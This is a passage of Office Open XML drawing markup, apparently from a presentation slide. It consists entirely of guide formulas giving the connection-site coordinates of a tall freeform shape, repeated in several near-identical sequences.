              <a:gd name="connsiteX53" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 21411 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY86" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY87" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 21411 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY86" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
